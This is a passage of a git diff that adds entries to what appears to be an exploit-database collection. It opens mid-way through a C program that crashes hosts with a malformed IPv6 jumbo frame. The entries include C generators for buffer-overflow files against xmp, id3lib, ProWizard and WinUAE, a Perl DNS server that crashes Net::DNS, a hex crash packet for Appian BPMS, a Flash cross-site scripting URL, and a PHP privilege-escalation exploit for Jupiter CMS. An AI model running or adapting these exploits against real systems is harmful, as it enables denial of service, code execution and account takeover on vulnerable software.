NULL) { + printf("malloc() error\n"); + exit(1); + } + memcpy(ret_addr, my_in6.s6_addr, 16); + return ret_addr; +} + +int main(int argc, char *argv[]) { + + if (argc < 4) { + printf("usage: ./ipv6_jumbo_crash +<00:11:22:33:44:55> \n"); + exit(1); + } + + /* handle IPv6 destination */ + unsigned char *dest_ip = resolve6(argv[1]); + + /* handle MAC */ + unsigned char dest_mac[7]; + sscanf(argv[2], "%x:%x:%x:%x:%x:%x", + (unsigned int*)&dest_mac[0], (unsigned +int*)&dest_mac[1], + (unsigned int*)&dest_mac[2], (unsigned +int*)&dest_mac[3], + (unsigned int*)&dest_mac[4], (unsigned +int*)&dest_mac[5]); + + /* handle interface */ + unsigned char *iface; + iface = argv[3]; + + /* buffer for ethernet frame */ + void *buffer = (void*)malloc(MY_FRAME_LEN); + + /* pointer to ethenet header */ + unsigned char *etherhead = buffer; + struct ethhdr *eh = (struct ethhdr *)etherhead; + + /* our MAC address */ + unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 +}; + unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; + + /* prepare socket */ + int s; + s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + printf("cannot create socket: [%d]\n",s); + exit(1); + } + + /* RAW communication */ + struct sockaddr_ll socket_address; + socket_address.sll_family = PF_PACKET; + socket_address.sll_protocol = htons(ETH_P_IP); + socket_address.sll_ifindex = if_nametoindex(iface); + socket_address.sll_hatype = ARPHRD_ETHER; + socket_address.sll_pkttype = PACKET_OTHERHOST; + socket_address.sll_halen = ETH_ALEN; + + /* set the frame header */ + memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); + memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); + eh->h_proto = 0xdd86; // IPv6 + + /* the buffer we want to send */ + unsigned char bad_buffer[] = { + 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; + + memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); + + /* overwrite our src and dst ip */ + memcpy((void*)(buffer+22), (void*)src_ip, 16); + memcpy((void*)(buffer+38), dest_ip, 16); + + /* send the buffer */ + int send_result = 0; + send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct +sockaddr*)&socket_address, sizeof(socket_address)); + if (send_result == -1) { + printf("could not send frame: [%d]\n", send_result); + exit(1); + } + else printf("frame send to ip [%s] with mac [%s] on iface +[%s]\n",argv[1],argv[2],argv[3]); + + return 0; +} diff --git a/platforms/linux/dos/30942.c b/platforms/linux/dos/30942.c new file mode 100755 index 000000000..c079254b0 --- /dev/null +++ b/platforms/linux/dos/30942.c @@ -0,0 +1,157 @@ +source: http://www.securityfocus.com/bid/27047/info + +Extended Module Player (xmp) is prone to multiple local buffer-overflow vulnerabilities because it fails to perform adequate boundary checks before copying user-supplied input into an insufficiently sized buffer. + +These issues occur when the application handles specially crafted OXM and DTT files. + +Attackers can exploit these issues to execute arbitrary code that could compromise the affected computer. Failed attacks will likely cause denial-of-service conditions. + +Extended Media Player 2.5.1 is vulnerable; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BUFFSZ 8192 +#define BOFCHR 0x41414141 +#define BOF1SZ 380 +#define BOF2SZ 3000 +#define u8 unsigned char + + + +int putmm(u8 *data, u8 *src, int len); +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + attack; + u8 buff[BUFFSZ], + *fname, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "Extended Module Player <= 2.5.1 buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attack:\n" + " 1 = test_oxm, only *nix XMP reads this format (*.OXM)\n" + " 2 = dtt_load (*.DTT)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + p = buff; + + if(attack == 1) { + printf("- test_oxm\n"); + + p += putmm(p, "Extended Module:", 16); + p += putmm(p, "", 60 - 16); + p += putxx(p, 14, 32); // hlen + p += putmm(p, "", 6); + p += putxx(p, 0, 16); // npat + p += putxx(p, 1, 16); // nins + p += putxx(p, -1, 32); // ilen + for(i = 0; i < 32; i++) { + *p++ = 0xff; // buf + 27 (nsmp) + } // force return + for(i = 0; i < BOF2SZ; i++) { + *p++ = BOFCHR & 0xff; // buf + } + + } else if(attack == 2) { + printf("- dtt_load\n"); + + p += putxx(p, 'D', 8); + p += putxx(p, 's', 8); + p += putxx(p, 'k', 8); + p += putxx(p, 'T', 8); + p += putmm(p, "name", 64); + p += putmm(p, "author", 64); + p += putxx(p, 0, 32); // flags + p += putxx(p, 0, 32); // m->xxh->chn + p += putxx(p, 0, 32); // m->xxh->len + p += putmm(p, "", 8); // buf + p += putxx(p, 0, 32); // m->xxh->tpo + p += putxx(p, 0, 32); // m->xxh->rst + p += putxx(p, BOF1SZ, 32); // m->xxh->pat + p += putxx(p, 0, 32); // m->xxh->ins = m->xxh->smp + p += putmm(p, "", 3); // fread(m->xxo, 1, (m->xxh->len ++ 3) & ~3L, f); + for(i = 0; i < BOF1SZ; i++) { + p += putxx(p, BOFCHR, 32); // first buffer-overflow + } + for(i = 0; i < (((BOF1SZ + 3) >> 2) << 2); i++) { + *p++ = BOFCHR & 0xff; // second buffer-overflow + } + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + printf("- done\n"); + return(0); +} + + + +int putmm(u8 *data, u8 *src, int len) { + strncpy(data, src, len); + return(len); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + + diff --git a/platforms/linux/remote/30728.txt b/platforms/linux/remote/30728.txt new file mode 100755 index 000000000..dcfe14327 --- /dev/null +++ b/platforms/linux/remote/30728.txt @@ -0,0 +1,10 @@ +source: www.securityfocus.com/bid/26273/info + +Yarssr is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to inject and execute arbitrary malicious Perl code with the privileges of the user running the application. Successful exploits can compromise the application and possibly the underlying computer; other attacks are also possible. + +Yarssr 0.2.2 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/30728.rss + diff --git a/platforms/linux/remote/30895.pl b/platforms/linux/remote/30895.pl new file mode 100755 index 000000000..a06fe0524 --- /dev/null +++ b/platforms/linux/remote/30895.pl @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/26902/info + +The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses. + +Successfully exploiting this issue allows attackers to crash applications that use the affected module. + +Net::DNS 0.60 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl +# Beyond Security(c) +# Vulnerability found by beSTORM - DNS Server module + +use strict; +use IO::Socket; +my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO); +$MAXLEN = 1024; +$PORTNO = 5351; +$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@"; +print "Awaiting UDP messages on port $PORTNO\n"; + +my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61". +"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03". +"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79". +"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00". +"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62". +"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f". +"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03". +"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69". +"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e". +"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01". +"\x00\x01\x00\x00\x00\x01\x00\x01\x41"; +while ($sock->recv($newmsg, $MAXLEN)) { + my($port, $ipaddr) = sockaddr_in($sock->peername); + $hishost = gethostbyaddr($ipaddr, AF_INET); + print "Client $hishost said ``$newmsg''\n"; + $sock->send($oldmsg); + $oldmsg = "[$hishost] $newmsg"; +} +die "recv: $!"; diff --git a/platforms/multiple/dos/30779.txt b/platforms/multiple/dos/30779.txt new file mode 100755 index 000000000..1d9c22d9e --- /dev/null +++ b/platforms/multiple/dos/30779.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26502/info + +Rigs of Rods is prone to a remote buffer-overflow because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker could exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service. + +This issue affects Rigs of Rods 0.33d and prior versions. + +http://www.exploit-db.com/sploits/30779.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30791.txt b/platforms/multiple/dos/30791.txt new file mode 100755 index 000000000..9a5fa1bd7 --- /dev/null +++ b/platforms/multiple/dos/30791.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26516/info + +Multiple denial-of-service vulnerabilities affect I Hear U because the application fails to handle specially crafted packets. + +An attacker may leverage these issues to cause a remote denial-of-service condition in affected applications. + +These issues affect versions prior to I Hear U 0.5.7. + +http://www.exploit-db.com/sploits/30791.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30856.txt b/platforms/multiple/dos/30856.txt new file mode 100755 index 000000000..7362ce518 --- /dev/null +++ b/platforms/multiple/dos/30856.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26771/info + +Easy File Sharing Web Server is prone to a directory-traversal and multiple information-disclosure vulnerabilities. + +Successfully exploiting these issues allows remote attackers to upload files to arbitrary locations and to access potentially sensitive information, which may aid in further attacks. + +Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected. + +http://www.exploit-db.com/sploits/30856.zip \ No newline at end of file diff --git a/platforms/multiple/dos/30896.txt b/platforms/multiple/dos/30896.txt new file mode 100755 index 000000000..cdc8fb629 --- /dev/null +++ b/platforms/multiple/dos/30896.txt @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/26913/info + +Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets. + +Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users. + +This issue affects Appian BPMS 5.6 SP1; other versions may be vulnerable as well. + +\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x73\x61\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x31\x35\x39\x36\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x04\x03\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x05\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x0a\x05\x00\x00\x00\x43\x54\x2d\x4c\x69\x62\x72\x61\x72\x79 +\x0a\x05\x00\x00\x00\x00\x0d\x11\x00\x73\x5f\x65\x6e\x67\x6c\x69 +\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x02\x01\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x69\x73\x6f +\x5f\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x35\x31\x32 +\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33 +\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00 +\x00 + diff --git a/platforms/multiple/dos/30903.c b/platforms/multiple/dos/30903.c new file mode 100755 index 000000000..234131e66 --- /dev/null +++ b/platforms/multiple/dos/30903.c @@ -0,0 +1,100 @@ +source: http://www.securityfocus.com/bid/26945/info + +The 'id3lib' library is prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users. + +This issue affects versions of id3lib committed to the CVS repository; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define u8 unsigned char +#define MASK(bits) ((1 << (bits)) - 1) + + + +int w28(u8 *data, unsigned num); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i; + u8 buff[1024], + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "id3lib (devel CVS) array overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s \n" + "\n", argv[0]); + exit(1); + } + + p = buff; + *p++ = 'I'; // "ID3" + *p++ = 'D'; + *p++ = '3'; + *p++ = 4; // ID3v2 4.0 + *p++ = 0; + *p++ = 1 << 6; // flags: extended + p += w28(p, 0); // this->SetDataSize + p += w28(p, 0); // not used by id3lib + *p++ = 6; // extflagbytes + for(i = 0; i < 20; i++) { + *p++ = 0xcc; + } + + printf("- create file %s\n", argv[1]); + fd = fopen(argv[1], "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + printf("- done\n"); + return(0); +} + + + +int w28(u8 *data, unsigned num) { + const unsigned short BITSUSED = 7; + const unsigned MAXVAL = MASK(BITSUSED * 4); + int i; + + if(num > MAXVAL) num = MAXVAL; + + for(i = 0; i < 4; i++) { + data[4 - i - 1] = num & MASK(BITSUSED); + num >>= BITSUSED; + } + return(4); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/dos/30906.c b/platforms/multiple/dos/30906.c new file mode 100755 index 000000000..04c0a57b6 --- /dev/null +++ b/platforms/multiple/dos/30906.c @@ -0,0 +1,222 @@ +source: http://www.securityfocus.com/bid/26953/info + +ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions. + +These issues affect ProWizard 4 PC 1.62 and prior versions; other versions may also be vulnerable. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BUFFSZ 0xffff +#define BOFCHR 0x58585858 +#define u8 unsigned char + + + +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + j, + attack, + samp_off, + inst_off, + songs_off, + bofnum; + u8 *fname, + *buff, + *p, + *file_size; + + setbuf(stdout, NULL); + + fputs("\n" + "Pro-Wizard <= 1.62 multiple buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attack:\n" + " 1 = AMOS-MusicBank\n" + " 2 = FuzzacPacker\n" + " 3 = QuadraComposer\n" + " 4 = SkytPacker (unexploitable due to only one byte in a 32 bit array)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + memset(buff, 0, BUFFSZ); + p = buff; + + songs_off = 256; // some values + samp_off = 256; + inst_off = 1024; + bofnum = 255; + file_size = NULL; + + if(attack == 1) { + printf("- AMOS-MusicBank\n"); + + p += putxx(p, 'A', 8); + p += putxx(p, 'm', 8); + p += putxx(p, 'B', 8); + p += putxx(p, 'k', 8); + p += putxx(p, 0x00, 8); + p += putxx(p, 0x03, 8); + p += putxx(p, 0x00, 8); + p += putxx(p, 0x01, 8); + file_size = p; // BANK_LEN + p += 4; + p += putxx(p, 'M', 8); + p += putxx(p, 'u', 8); + p += putxx(p, 's', 8); + p += putxx(p, 'i', 8); + p += putxx(p, 'c', 8); + p += putxx(p, ' ', 8); + p += putxx(p, ' ', 8); + p += putxx(p, ' ', 8); + p += putxx(p, inst_off, 32); // INST_HDATA_ADDY + p += putxx(p, songs_off, 32); // SONGS_DATA_ADDY + p += putxx(p, 0, 32); // PAT_DATA_ADDY + p = buff + (songs_off + 0x14); + p += putxx(p, 1, 16); + p += putxx(p, 0, 32); + p = buff + (inst_off + 0x14); + + p += putxx(p, bofnum, 16); // samples + for(i = 0; i < bofnum; i++) { + putxx(p, BOFCHR, 32); + p += 32; + } + + putxx(file_size, (p - buff) - 12, 32); + + } else if(attack == 2) { + printf("- FuzzacPacker\n"); + + p += putxx(p, 'M', 8); + p += putxx(p, '1', 8); + p += putxx(p, '.', 8); + p += putxx(p, '0', 8); + p += 2 + (68 * 31); + p += putxx(p, bofnum, 8); // PatPos + p += putxx(p, 0, 8); // NbrTracks + p = buff + 2118; + + for(i = 0; i < (4 * bofnum * 4); i++) { + p += putxx(p, bofnum, 8); + } + p += putxx(p, BOFCHR, 32); + + } else if(attack == 3) { + printf("- QuadraComposer\n"); + + bofnum = 32; // max 32 + + p += putxx(p, 'F', 8); + p += putxx(p, 'O', 8); + p += putxx(p, 'R', 8); + p += putxx(p, 'M', 8); + file_size = p; + p += 4; + p += putxx(p, 'E', 8); + p += putxx(p, 'M', 8); + p += putxx(p, 'O', 8); + p += putxx(p, 'D', 8); + p += putxx(p, 'E', 8); + p += putxx(p, 'M', 8); + p += putxx(p, 'I', 8); + p += putxx(p, 'C', 8); + p = buff + 22 + 41; + p += putxx(p, bofnum, 8); + for(i = 0; i < bofnum; i++) { + p[0] = i + 0x70; + putxx(p + 2, BOFCHR / 2, 16); + putxx(p + 30, BOFCHR, 32); + p += 34; + } + p += 1000; + + putxx(file_size, (p - buff) - 8, 32); + + } else if(attack == 4) { + printf("- SkytPacker\n"); + + p += 256; + p += putxx(p, 'S', 8); + p += putxx(p, 'K', 8); + p += putxx(p, 'Y', 8); + p += putxx(p, 'T', 8); + p = buff + 260; + p += putxx(p, bofnum - 1, 8); + for(i = 0; i < bofnum; i++) { + for(j = 0; j < 4; j++) { + p += putxx(p, BOFCHR, 8); + p += putxx(p, BOFCHR, 8); + } + } + p += 22529; + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + free(buff); + printf("- done\n"); + return(0); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/dos/30922.c b/platforms/multiple/dos/30922.c new file mode 100755 index 000000000..9f35bff72 --- /dev/null +++ b/platforms/multiple/dos/30922.c @@ -0,0 +1,109 @@ +source: http://www.securityfocus.com/bid/26979/info + +WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. + +This issue affects versions prior to WinUAE 1.4.5. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BOFSZ 10000 // 1000 + 8192 + the rest +#define BUFFSZ (BOFSZ + 32) +#define u8 unsigned char + + + +int putsc(u8 *data, int chr, int len); +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + u8 *fname, + *buff, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "WinUAE <= 1.4.4 gunzip buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s \n" + "\n", argv[0]); + exit(1); + } + + fname = argv[1]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + + p = buff; + p += putxx(p, 0x1f, 8); // header[0] + p += putxx(p, 0x8b, 8); // header[1] + p += putxx(p, 0x00, 8); // header[2] + p += putxx(p, 0x08, 8); // flags + p += putsc(p, 0x00, 6); // rest of the header + p += putsc(p, 'A', BOFSZ); // filename buffer-overflow + p += putxx(p, 0, 8); // NULL byte delimiter + p += putxx(p, -1, 32); // force the return + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + free(buff); + printf("- done\n"); + return(0); +} + + + +int putsc(u8 *data, int chr, int len) { + memset(data, chr, len); + return(len); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/remote/30850.txt b/platforms/multiple/remote/30850.txt new file mode 100755 index 000000000..9eab41640 --- /dev/null +++ b/platforms/multiple/remote/30850.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26732/info + +HFS HTTP File Server is prone to a vulnerability that lets attackers upload files and place them in arbitrary locations on the server. The issue occurs because the software fails to adequately sanitize user-supplied input. + +A successful exploit may allow the attacker to upload malicious files and potentially execute them; this may lead to various attacks. + +This issue affects versions prior to HTTP File Server 2.2b. + +http://www.exploit-db.com/sploits/30850.zip \ No newline at end of file diff --git a/platforms/multiple/remote/30905.txt b/platforms/multiple/remote/30905.txt new file mode 100755 index 000000000..14b8dcbea --- /dev/null +++ b/platforms/multiple/remote/30905.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26949/info + +Adobe Flash Player is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)// \ No newline at end of file diff --git a/platforms/multiple/remote/30933.php b/platforms/multiple/remote/30933.php new file mode 100755 index 000000000..321184c13 --- /dev/null +++ b/platforms/multiple/remote/30933.php @@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/27007/info + +Zoom Player is prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users. + +This issue affects Zoom Player 6.00 beta 2 and all releases contained in the Zoom Player 5 branch. + + \ No newline at end of file diff --git a/platforms/php/remote/30928.php b/platforms/php/remote/30928.php new file mode 100755 index 000000000..0516c46fa --- /dev/null +++ b/platforms/php/remote/30928.php @@ -0,0 +1,144 @@ +source: http://www.securityfocus.com/bid/27001/info + +PDFlib is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. + +Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions. + +PDFlib 7.02 is vulnerable; other versions may also be affected. + + + + + + +Jupiter 1.1.5ex Privileges Escalation + + + +
+Target URL (whit trailing slash) :

+http://

+Username :

+

+Password :

+

+*First Create an account on target!
+The exploit will login with this username and password and then grants +full access to this account!

+ +
+No response from '.htmlentities($host).'
'); +} + +if(isset($_POST['start'])) +{ + if ($_POST['target'] == '' || $_POST['username'] == '' || +$_POST['username'] == '') + { + die('Error : All fields are required!'); + } + $Target = trim($_POST['target']); + $Username = trim($_POST['username']); + $Password = trim($_POST['password']); + $Target .= ($Target[strlen($Target)-1] <> '/') ? '/' : ''; + $host = substr($Target, 0 ,strpos($Target, '/')); + $path = substr($Target, strpos($Target, '/')); + $Query1 = $path.'index.php'; + $packet1 = "HEAD $Query1 HTTP/1.1\r\n"; + $packet1 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet1 .= "Host: ".$host."\r\n"; + $packet1 .= "Connection: Close\r\n\r\n"; + sendpacket($packet1); + echo nl2br(htmlentities($html)); + $Pattern = "(PHPSESSID=[a-z0-9]{20,32})"; + if(preg_match($Pattern, $html, $Matches)) + { + $Match = $Matches[0]; + $PHPSESSID = substr($Match, 10, strlen($Match)); + } + $Query2 = $path.'index.php?n=modules/login'; + $packet2 = "POST +$Query2&username=$Username&password=$Password&submit=Login&PHPSESSID=$PHPSESSID +HTTP/1.1\r\n"; + $packet2 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet2 .= "Host: ".$host."\r\n"; + $packet2 .= "Connection: Close\r\n\r\n"; + sendpacket($packet2); + if(stristr($html , 'i=1') == true) + { + die('Error : Incorrect username or password! Try +again!'); + } else + if(stristr($html , 'i=5') == true) + { + die('Error : Someone is currently using that account!'); + } else + $RandMail = substr($PHPSESSID, 10, 6).'_mail@none.com'; + $Query3 = +$path.'index.php?n=modules/panel&a=2&tmp[authorization]=4'; + $packet3 = "POST +$Query3&editpassword=&editpassword2=&editemail=$RandMail&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID=$PHPSESSID +HTTP/1.1\r\n"; + $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet3 .= "Host: ".$host."\r\n"; + $packet3 .= "Connection: Close\r\n\r\n"; + sendpacket($packet3); + if(stristr($html , 'i=26') == false) + { + die('Exploit Failed'); + } + $Query4 = $path.'index.php?n=modules/login&a=1'; + $packet4 = "POST $Query4&PHPSESSID=$PHPSESSID HTTP/1.1\r\n"; + $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet4 .= "Host: ".$host."\r\n"; + $packet4 .= "Connection: Close\r\n\r\n"; + sendpacket($packet4); + die('Exploit 